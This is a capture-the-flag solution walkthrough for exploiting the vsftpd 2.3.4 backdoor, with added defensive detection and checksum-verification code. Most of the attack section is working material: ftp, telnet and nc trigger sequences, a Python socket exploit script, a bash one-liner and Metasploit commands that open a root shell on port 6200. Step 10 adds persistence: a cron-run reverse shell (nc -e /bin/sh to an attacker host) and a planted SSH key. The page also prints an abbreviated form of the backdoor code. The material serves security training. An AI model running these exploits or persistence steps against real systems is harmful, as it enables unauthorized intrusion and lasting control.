
  • Easy
  • Released 01 May 2024

🔓 Can you exploit the hidden backdoor in this FTP server?

A seemingly innocent FTP server harbors a dark secret - a malicious backdoor inserted by attackers who compromised the official distribution. The vulnerability lies dormant, waiting for the right trigger to unleash remote access. 🎯 Time to discover how compromised software can become your gateway to system control!

1 flag · 10 points · Easy · Solution available · Free access

🔓 Anonymous FTP 2 - Complete Backdoor Exploitation Solution

Objective: Exploit the vsftpd 2.3.4 backdoor vulnerability to gain remote shell access and retrieve the flag from the target system.

🔍 Step 1: Service Discovery and Enumeration

Begin by scanning the target to identify running services:

# Nmap service scan
nmap -Pn -sV -p21,6200 <target-ip>

# Expected output:
# 21/tcp open ftp vsftpd 2.3.4
# 6200/tcp filtered unknown

The scan reveals vsftpd 2.3.4 running on port 21. Port 6200 may appear filtered initially but becomes important later.

🔍 Step 2: Understanding the vsftpd 2.3.4 Backdoor

The vsftpd 2.3.4 backdoor was inserted by attackers who compromised the official distribution in July 2011. The backdoor is triggered when a username containing the string ":)" is used during FTP authentication.

Backdoor Mechanism:
• When username contains ":)", the backdoor activates
• Opens a shell listener on port 6200
• Provides direct system access without authentication
• The backdoor code is in sysdeputil.c (vsf_sysutil_extra function)
🔍 Step 3: Triggering the Backdoor

Connect to the FTP service and trigger the backdoor using a malicious username:

Using FTP Client:

# Connect to FTP service
ftp <target-ip>

# When prompted for username:
Username: user:)
Password: anything

# The login will fail, but backdoor activates

Using Telnet:

# Connect via telnet
telnet <target-ip> 21

# Send FTP commands:
USER user:)
PASS anything

# Connection may close, but backdoor is active

🔍 Step 4: Connecting to the Backdoor Shell

After triggering the backdoor, connect to the shell listener on port 6200:

Backdoor Shell Access:
telnet <target-ip> 6200

or

nc <target-ip> 6200

You should now have a shell prompt with system access.

🔍 Step 5: System Exploration and Flag Retrieval

Once connected to the backdoor shell, explore the system to locate the flag:

# Check current directory
pwd

# List files in current directory
ls -la

# Look for flag in common locations
find / -name "flag*" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -i flag

# Check root directory
ls -la /root/

# Read the flag
cat /root/flag.txt

🔍 Step 6: Alternative Exploitation Methods

Using Metasploit:

# Start Metasploit
msfconsole

# Use the exploit module
use exploit/unix/ftp/vsftpd_234_backdoor

# Set target
set RHOSTS <target-ip>

# Run exploit
exploit

# Get shell session
sessions -i 1

Python Script:

# Create exploit script
import socket

# Trigger backdoor: send the ":)" username on the control channel, then drop the connection
s = socket.socket()
s.connect(('<target-ip>', 21))
s.send(b'USER user:)\r\n')
s.send(b'PASS pass\r\n')
s.close()

# Connect to the shell listener on port 6200 (see Step 4 for interacting with it via nc)
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))

Manual Verification:

# Check if backdoor is active
nmap -Pn -p6200 <target-ip>

# Should show port 6200 as open
# after triggering the backdoor

# Connect immediately
nc <target-ip> 6200

🔍 Step 7: Understanding the Vulnerability Code

The trigger check in str.c and the backdoor function in sysdeputil.c show how the vulnerability works (the function body is abbreviated here; the socket setup is summarised in comments):

// Trigger detection in str.c: looks for the byte pair 0x3a 0x29, i.e. ":"
if ((p_str->p_buf[i] == 0x3a) && (p_str->p_buf[i+1] == 0x29))
{
    vsf_sysutil_extra(); // Calls backdoor function
}

// Backdoor function in sysdeputil.c:
int vsf_sysutil_extra(void)
{
    int fd, rfd;
    struct sockaddr_in sa;
    // Creates a TCP socket and sets the listening port to 6200
    sa.sin_port = htons(6200);
    // Binds and listens on that port
    // Accepts a connection, redirects stdin/stdout/stderr to it, and spawns a shell
    execl("/bin/sh", "sh", (char *)0);
}

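The trigger described in Step 2 and the str.c byte check shown in Step 7 give a defender two things to look for: a USER command whose argument contains the byte pair 0x3a 0x29, and a connection to TCP port 6200 on the FTP host shortly afterwards. The following is an added example, not part of the lab solution or the vsftpd project: it mirrors the str.c check in Python, runs it over constructed vsftpd log lines (modelled on the format vsftpd writes when log_ftp_protocol=YES), and correlates hits with constructed network-sensor flow records. The 10.0.0.x addresses, the FTP_HOST value and the flow tuple layout are all hypothetical.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log, modelled on vsftpd's log format when log_ftp_protocol=YES
# (not taken from any real incident). The second client sends the ":)" trigger.
SAMPLE_LOG = """\
Mon Jul  4 10:00:00 2011 [pid 2] CONNECT: Client "10.0.0.5"
Mon Jul  4 10:00:01 2011 [pid 2] FTP command: Client "10.0.0.5", "USER alice"
Mon Jul  4 10:00:02 2011 [pid 2] [alice] OK LOGIN: Client "10.0.0.5"
Mon Jul  4 10:05:00 2011 [pid 3] CONNECT: Client "10.0.0.9"
Mon Jul  4 10:05:01 2011 [pid 3] FTP command: Client "10.0.0.9", "USER user:)"
Mon Jul  4 10:05:02 2011 [pid 3] [user:)] FAIL LOGIN: Client "10.0.0.9"
"""

# Constructed flow records from a hypothetical network sensor: (timestamp, src_ip, dst_ip, dst_port).
FTP_HOST = "10.0.0.2"  # hypothetical address of the vsftpd host
SAMPLE_FLOWS = [
    ("2011-07-04 10:00:00", "10.0.0.5", FTP_HOST, 21),
    ("2011-07-04 10:05:00", "10.0.0.9", FTP_HOST, 21),
    ("2011-07-04 10:05:04", "10.0.0.9", FTP_HOST, 6200),
]

# Matches only the "FTP command ... USER <name>" lines; the day field may be space-padded.
LOG_LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'FTP command: Client "(?P<ip>[^"]+)", "USER (?P<user>.*)"$'
)


def trigger_in_bytes(buf: bytes) -> bool:
    """Mirror of the str.c check: any 0x3a byte immediately followed by 0x29 (':' then ')')."""
    return any(buf[i] == 0x3A and buf[i + 1] == 0x29 for i in range(len(buf) - 1))


def find_trigger_attempts(log_text: str):
    """Return (timestamp, client_ip, username) for each USER command carrying the trigger."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        if trigger_in_bytes(m.group("user").encode("utf-8", "surrogateescape")):
            # Collapse the padded day field so strptime sees "Jul 4" rather than "Jul  4".
            ts = datetime.strptime(re.sub(r" +", " ", m.group("ts")), "%a %b %d %H:%M:%S %Y")
            hits.append((ts, m.group("ip"), m.group("user")))
    return hits


def correlate_with_flows(hits, flows, ftp_host, window_seconds=60):
    """Pair each trigger attempt with a later connection from the same client to port 6200 on the FTP host."""
    alerts = []
    for ts, ip, user in hits:
        for fts, src, dst, dport in flows:
            f_time = datetime.strptime(fts, "%Y-%m-%d %H:%M:%S")
            in_window = ts <= f_time <= ts + timedelta(seconds=window_seconds)
            if src == ip and dst == ftp_host and dport == 6200 and in_window:
                alerts.append({
                    "client": ip,
                    "user": user,
                    "trigger_at": ts.isoformat(),
                    "shell_connect_at": f_time.isoformat(),
                })
    return alerts


if __name__ == "__main__":
    hits = find_trigger_attempts(SAMPLE_LOG)
    for alert in correlate_with_flows(hits, SAMPLE_FLOWS, FTP_HOST):
        print("ALERT: backdoor trigger followed by port-6200 connection:", alert)
```

The byte-level check is deliberately the same test the backdoor performs, so it also catches usernames where ":)" is embedded mid-string rather than at the end. The flow correlation is the higher-confidence signal: a USER line with the trigger is suspicious on its own, but a trigger followed within the window by a connection to port 6200 on the same host means the listener actually came up.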
🔍 Step 8: Exploitation Timeline
  1. Connect to FTP: Establish connection to port 21
  2. Send Malicious Username: Use username containing ":)"
  3. Backdoor Activation: Server processes trigger and opens port 6200
  4. Shell Access: Connect to port 6200 for direct shell access
  5. Flag Retrieval: Navigate filesystem and locate flag file

🔍 Step 9: Common Troubleshooting

Issue                      | Cause                  | Solution
---------------------------|------------------------|-------------------------------------------
Port 6200 not opening      | Backdoor not triggered | Ensure username contains ":)" exactly
Connection refused on 6200 | Timing issue           | Wait a few seconds after FTP login attempt
Shell not responsive       | Connection timeout     | Try multiple connection attempts
FTP login succeeds         | Wrong vsftpd version   | Verify target is running vsftpd 2.3.4

🔍 Step 10: Advanced Techniques

Automated Exploitation:

# Bash one-liner
(echo 'USER user:)'; echo 'PASS pass'; sleep 2) | nc <target-ip> 21 && nc <target-ip> 6200

# Python automation
#!/usr/bin/env python3
import socket, time
s = socket.socket()
s.connect(('<target-ip>', 21))
s.send(b'USER user:)\r\n')
s.send(b'PASS pass\r\n')
s.close()
time.sleep(2)
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))

Persistence Techniques:

# Once in shell, establish persistence
echo 'nc -e /bin/sh <attacker-ip> 4444' > /tmp/backdoor.sh
chmod +x /tmp/backdoor.sh

# Add to crontab
echo '* * * * * /tmp/backdoor.sh' | crontab -

# Or create SSH key
mkdir -p ~/.ssh
echo 'ssh-rsa AAAA...' > ~/.ssh/authorized_keys

🔍 Step 11: Flag Location and Extraction

The flag is typically located in the root directory:

Flag Extraction Commands:
# Navigate to root directory
cd /root

# List files
ls -la

# Read flag file
cat flag.txt

# Alternative search
find / -name "flag.txt" 2>/dev/null
cat $(find / -name "flag.txt" 2>/dev/null)

🔍 Step 12: Security Implications

This vulnerability demonstrates several critical security concepts:

  • Supply Chain Attacks: Compromised software distributions
  • Backdoor Persistence: Hidden access mechanisms in legitimate software
  • Network Service Exploitation: Leveraging service vulnerabilities for system access
  • Post-Exploitation: System exploration and data exfiltration
  • Detection Evasion: Backdoors designed to appear as normal functionality

🔍 Step 13: Remediation and Prevention

To prevent similar vulnerabilities:

  • Software Verification: Verify checksums and digital signatures
  • Source Code Auditing: Regular security code reviews
  • Network Monitoring: Monitor for unusual network connections
  • Patch Management: Keep software updated from trusted sources
  • Intrusion Detection: Deploy IDS/IPS to detect exploitation attempts
  • Least Privilege: Run services with minimal required privileges
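The first bullet, software verification, is the control that addresses this class of supply-chain compromise directly. The point is not just to hash the download, but to compare it against a digest obtained out of band (a signed release announcement, a vendor page on a different host) rather than a SUMS file served from the same mirror, since an attacker who can replace the tarball can usually replace the checksum file beside it. The following is an added example, not part of the page or of any project's tooling: a small Python verifier that parses a sha256sum-style file, cross-checks it against a pinned digest, and then checks the artifact bytes. The artifact name, the artifact bytes and the pinned value are constructed (the digest is SHA-256 of the three bytes "abc"); real releases would use the real tarball and a digest you fetched separately.

```python
import hashlib
import hmac

# Constructed stand-in for a downloaded release archive (not a real tarball).
ARTIFACT_NAME = "example-server-1.0.tar.gz"
GOOD_ARTIFACT = b"abc"
TAMPERED_ARTIFACT = b"abc\n"  # one byte appended, standing in for a trojaned archive

# Digest obtained out of band (e.g. from a signed release announcement), NOT from the
# download mirror. Constructed pin: this is SHA-256 of b"abc".
PINNED_SHA256 = {
    ARTIFACT_NAME: "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad",
}

# Constructed SHA256SUMS file as a mirror might serve it next to the download.
SERVED_SUMS = """\
# SHA256SUMS
ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad  example-server-1.0.tar.gz
"""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_sums_file(text: str) -> dict:
    """Parse sha256sum-style lines ('<hex>  <name>' or '<hex> *<name>') into {name: hex}."""
    sums = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")  # drop the second space or the binary-mode '*' marker
        digest = digest.lower()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest) or not name:
            raise ValueError(f"malformed checksum line: {raw!r}")
        sums[name] = digest
    return sums


def verify_artifact(name: str, data: bytes, served_sums: dict, pinned: dict):
    """Return (ok, reason).

    The served checksum must agree with the out-of-band pin, and the artifact
    bytes must hash to that pin. Comparisons use compare_digest so a verifier
    exposed to untrusted input does not leak through timing.
    """
    pin = pinned.get(name)
    if pin is None:
        return False, "no out-of-band digest pinned for this artifact"
    served = served_sums.get(name)
    if served is None:
        return False, "artifact not listed in served SUMS file"
    if not hmac.compare_digest(served, pin):
        return False, "served checksum disagrees with pinned digest: mirror or SUMS file may be tampered"
    if not hmac.compare_digest(sha256_hex(data), pin):
        return False, "artifact bytes do not match pinned digest"
    return True, "ok"


if __name__ == "__main__":
    sums = parse_sums_file(SERVED_SUMS)
    for label, blob in (("good", GOOD_ARTIFACT), ("tampered", TAMPERED_ARTIFACT)):
        print(label, verify_artifact(ARTIFACT_NAME, blob, sums, PINNED_SHA256))
```

A detached signature check (for example gpg --verify over the tarball) adds what a pinned hash cannot: binding to a specific signing key, so that a mirror serving both a modified archive and a matching checksum still fails verification. The hash-pinning logic above is the minimum that makes the "verify checksums" bullet meaningful in practice.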

Historical Context: The vsftpd 2.3.4 backdoor was discovered in July 2011 and represents one of the most well-known examples of a compromised software distribution. The backdoor was inserted by attackers who gained access to the official download site.

Flag Retrieval: After successfully exploiting the backdoor and gaining shell access, the flag can be found in /root/flag.txt and should be submitted to complete the challenge.

Real-World Application: This challenge demonstrates realistic exploitation techniques used in penetration testing and red team exercises. The vsftpd backdoor remains a common target in CTF competitions and security training scenarios.